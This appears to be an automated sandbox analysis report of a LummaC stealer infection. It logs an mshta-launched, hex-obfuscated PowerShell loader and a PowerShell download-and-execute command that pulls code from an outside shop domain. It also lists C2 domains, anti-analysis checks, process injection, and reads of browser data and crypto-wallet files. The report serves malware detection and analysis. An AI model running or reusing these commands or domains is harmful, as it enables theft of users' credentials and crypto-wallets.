Source: C:\Windows\SysWOW64\mshta.exe	File opened: C:\Windows\SysWOW64\sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	File opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\COMCTL32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	File opened: C:\Windows\SysWOW64\USERENV.dll	Jump to behavior

Source: powershell.exe, 00000002.00000002.2152519562.0000000007930000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000002.00000002.2158169386.0000000008A13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: mshta.exe, 00000000.00000003.2163551740.0000000002951000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000008.00000002.4462317019.000000000069C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4463612198.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.3304223704.0000000007282000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

API call chain: ExitProcess graph end node

graph_8-13078

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_0052B460 LdrInitializeThunk,

8_2_0052B460

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_6624.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_7464.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7464, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))}

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 4F0000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: powershell.exe, 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: hummskitnj.buzz
Source: powershell.exe, 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: cashfuzysao.buzz
Source: powershell.exe, 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: appliacnesot.buzz
Source: powershell.exe, 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: screwamusresz.buzz
Source: powershell.exe, 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: inherineau.buzz
Source: powershell.exe, 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: scentniej.buzz
Source: powershell.exe, 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: rebuildeso.buzz
Source: powershell.exe, 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: prisonyfork.buzz
Source: powershell.exe, 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: crackerdolk.click

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B09326	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))}	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function ronh($zugfp){return -split ($zugfp -replace '..', '0x$& ')};$hcnm = ronh('c3930bc54871f266aff2c12a03be01bac619730d50b7b296848b0ce355ef4aad63dad551cf518740cff825344b7c3e8930abd7e087dc165f9fa695481870bd210973ceffe5f8743015e9e067be32b8d28fc34d427f57004108d4924938d42b9c68e78c8baeec7b88edbf7e26d65bbeb339c85352398379212a4da0fda9378fa9ee2979ef8c68b2c848b07239f0fe9081e18a3e2747428eacab76496a5d46ecc618715969beb2aa550fcc19d2801e7412d5ccb10d7fc87b3ccfca2c5142fff0a92bf434e5b0634e25f43d5a1d49af292ef18995535eadd316387361090364fcdb53cf147d38015cde7c196bcb2487a645fe6e879997db0b013559ae94af7ae0a057520d706aabbbb3c4599241dc59e43af4317bbf33ff72b63c4d6f40a4cf4fba5443410e7d4fdbb2daab0b099c9cbbdf16a73778acb0aaf9970d84b1c2fe02073c14045a04f38ec73d1f5fe068051b40e010417ae6630af70e00695c608bc0861330974406c2434cdef8351aa4c08151e713b3e1161be6479227d497878812334f53852e161933df3ac49002f901ef720bd24ebc005803cc3fb5d9730a35474de935bb0da3cd0db74dd2f1a75d4c2c82def41f1f7e055aa35e28f60ebc5d1aa4cf8b043e2db0c3431ec5b92d16094a177af2c20a61c912b7de1a05e9ac70c3fc34f259afbc8229de2c7404fa77695b9b9b64b6cccc15261dd3287767966c69ca3447d29f6c28aaed13f5700dd3c2344bbbc440ef822fa03ed85a66458f8096a217892ce5bd92b17a636a13078002a9f12df30bbc21fbfc27825674e1f156c08b1f7be8110450aaafe84a212e2539e9d958c27cba9258e0f2eb2302b3c025c3e8f2af1d4975b918f51a7e4b0e2d658450a8baa98df067b355e280e6f33e6d6e729f9bf2a721e484c32fc60e22909d4a00f86690a401e2249b69a64b01b2ef84d697a10e34bfb44195cefa63c8603ac785033b7f295fb45f066e298773d832db3e9a5c2228a617a7493c760cf7b8a234974a7d9ffe59773d18e13f4c2b106a18753cb10177d79e9329a5839f3bbd922320be5c516b60190fbf08e4f48dd96d3c6fc263511d230c8ee4c5016fcaf3f85211aa23d5d686382382d564c6e8db3107fb4842199ceaabf6eb258752f65c408d2c95ba3ac3c4ba6634c579d8e2af7478d305a2b454111ca906551bede47d883c897d123dd54db270edb40162edf8558ab2673ced4556848fbd0f0ea7e491c6cb594ec95a7dc54749d99912a60c79dca4d598aa2335146b6d936341e271b5ee53dc7e88abfe799563c3f66b92d8e53182f74fe62d5e058b1d6a532974692d259673f216d5e037875df42348a3cbc56b68e7f61bb04f8de43b8b56af5f12ee9ce635f60999bd302d33d994f58d54eacf34355dbb7e858e578c3c464d9dfe385ca2ba8ca5920fa0cd69d14616cf89b14b05812b1e052ecce3f7fb706d97b865fd0c6506ce32f646039b92f147f82037e1bca4a16ede04a52f754852062cc5ffe79f1c1811c2a4ee43ff38387c4cd11a2edca6c57216dfc5d9e29adff0d5accf05998c02101cd723667780f3ece0c9d8a3501f34e27653c8cc454ac1b9cfd63c7077f0256949ad3e3daf6c6b099a8fdfbd7d13b638de640a14acfa2ed35860392cbfaf118de0ba089d071f46ab6709e49ad48a6bcb90f215d487648968f3d24e4f165e6104c06bfd0522bf67bd6fc0e5e50796821857a2fb3f2c891aabba7ef8ad692660794579db6a00d57fbaf9f2ad64863974071c4d7e8c8be2bdf8923280c6936769e41e84567c4940ebcd713f945df7292ad0c75b27f4bebdd48b6a53c89741aa6e5c0a8e6fa33c1b74178f50fa6fb6249b241dabe92267bc0a3dd4adc73a94749c2e2eeffa8da6f2a045fb97c908b9436225edf216daf831e28ac1d8377c036aa3f2324db4b8937836b29b3712ad27ebe29b03db7930c6b09326
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function ronh($zugfp){return -split ($zugfp -replace '..', '0x$& ')};$hcnm = ronh('c3930bc54871f266aff2c12a03be01bac619730d50b7b296848b0ce355ef4aad63dad551cf518740cff825344b7c3e8930abd7e087dc165f9fa695481870bd210973ceffe5f8743015e9e067be32b8d28fc34d427f57004108d4924938d42b9c68e78c8baeec7b88edbf7e26d65bbeb339c85352398379212a4da0fda9378fa9ee2979ef8c68b2c848b07239f0fe9081e18a3e2747428eacab76496a5d46ecc618715969beb2aa550fcc19d2801e7412d5ccb10d7fc87b3ccfca2c5142fff0a92bf434e5b0634e25f43d5a1d49af292ef18995535eadd316387361090364fcdb53cf147d38015cde7c196bcb2487a645fe6e879997db0b013559ae94af7ae0a057520d706aabbbb3c4599241dc59e43af4317bbf33ff72b63c4d6f40a4cf4fba5443410e7d4fdbb2daab0b099c9cbbdf16a73778acb0aaf9970d84b1c2fe02073c14045a04f38ec73d1f5fe068051b40e010417ae6630af70e00695c608bc0861330974406c2434cdef8351aa4c08151e713b3e1161be6479227d497878812334f53852e161933df3ac49002f901ef720bd24ebc005803cc3fb5d9730a35474de935bb0da3cd0db74dd2f1a75d4c2c82def41f1f7e055aa35e28f60ebc5d1aa4cf8b043e2db0c3431ec5b92d16094a177af2c20a61c912b7de1a05e9ac70c3fc34f259afbc8229de2c7404fa77695b9b9b64b6cccc15261dd3287767966c69ca3447d29f6c28aaed13f5700dd3c2344bbbc440ef822fa03ed85a66458f8096a217892ce5bd92b17a636a13078002a9f12df30bbc21fbfc27825674e1f156c08b1f7be8110450aaafe84a212e2539e9d958c27cba9258e0f2eb2302b3c025c3e8f2af1d4975b918f51a7e4b0e2d658450a8baa98df067b355e280e6f33e6d6e729f9bf2a721e484c32fc60e22909d4a00f86690a401e2249b69a64b01b2ef84d697a10e34bfb44195cefa63c8603ac785033b7f295fb45f066e298773d832db3e9a5c2228a617a7493c760cf7b8a234974a7d9ffe59773d18e13f4c2b106a18753cb10177d79e9329a5839f3bbd922320be5c516b60190fbf08e4f48dd96d3c6fc263511d230c8ee4c5016fcaf3f85211aa23d5d686382382d564c6e8db3107fb4842199ceaabf6eb258752f65c408d2c95ba3ac3c4ba6634c579d8e2af7478d305a2b454111ca906551bede47d883c897d123dd54db270edb40162edf8558ab2673ced4556848fbd0f0ea7e491c6cb594ec95a7dc54749d99912a60c79dca4d598aa2335146b6d936341e271b5ee53dc7e88abfe799563c3f66b92d8e53182f74fe62d5e058b1d6a532974692d259673f216d5e037875df42348a3cbc56b68e7f61bb04f8de43b8b56af5f12ee9ce635f60999bd302d33d994f58d54eacf34355dbb7e858e578c3c464d9dfe385ca2ba8ca5920fa0cd69d14616cf89b14b05812b1e052ecce3f7fb706d97b865fd0c6506ce32f646039b92f147f82037e1bca4a16ede04a52f754852062cc5ffe79f1c1811c2a4ee43ff38387c4cd11a2edca6c57216dfc5d9e29adff0d5accf05998c02101cd723667780f3ece0c9d8a3501f34e27653c8cc454ac1b9cfd63c7077f0256949ad3e3daf6c6b099a8fdfbd7d13b638de640a14acfa2ed35860392cbfaf118de0ba089d071f46ab6709e49ad48a6bcb90f215d487648968f3d24e4f165e6104c06bfd0522bf67bd6fc0e5e50796821857a2fb3f2c891aabba7ef8ad692660794579db6a00d57fbaf9f2ad64863974071c4d7e8c8be2bdf8923280c6936769e41e84567c4940ebcd713f945df7292ad0c75b27f4bebdd48b6a53c89741aa6e5c0a8e6fa33c1b74178f50fa6fb6249b241dabe92267bc0a3dd4adc73a94749c2e2eeffa8da6f2a045fb97c908b9436225edf216daf831e28ac1d8377c036aa3f2324db4b8937836b29b3712ad27ebe29b03db7930c6b09326			Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OllyDbg.exe
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tcpview.exe
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Wireshark.exe
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: lordpe.exe
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Procmon.exe
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: autoruns.exe
Source: powershell.exe, 00000002.00000002.2147721025.00000000052D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: regmon.exe

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7448, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: powershell.exe, 00000008.00000002.4465039949.0000000000738000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: electrum
Source: powershell.exe, 00000008.00000002.4463612198.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: powershell.exe, 00000008.00000002.4464852873.0000000000725000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: powershell.exe, 00000008.00000002.4463612198.00000000006D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: powershell.exe, 00000008.00000002.4465039949.0000000000738000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus
Source: powershell.exe, 00000008.00000002.4465039949.0000000000738000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ethereum
Source: powershell.exe, 00000008.00000002.4464852873.0000000000725000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: powershell.exe, 00000002.00000002.2154778232.0000000007C80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
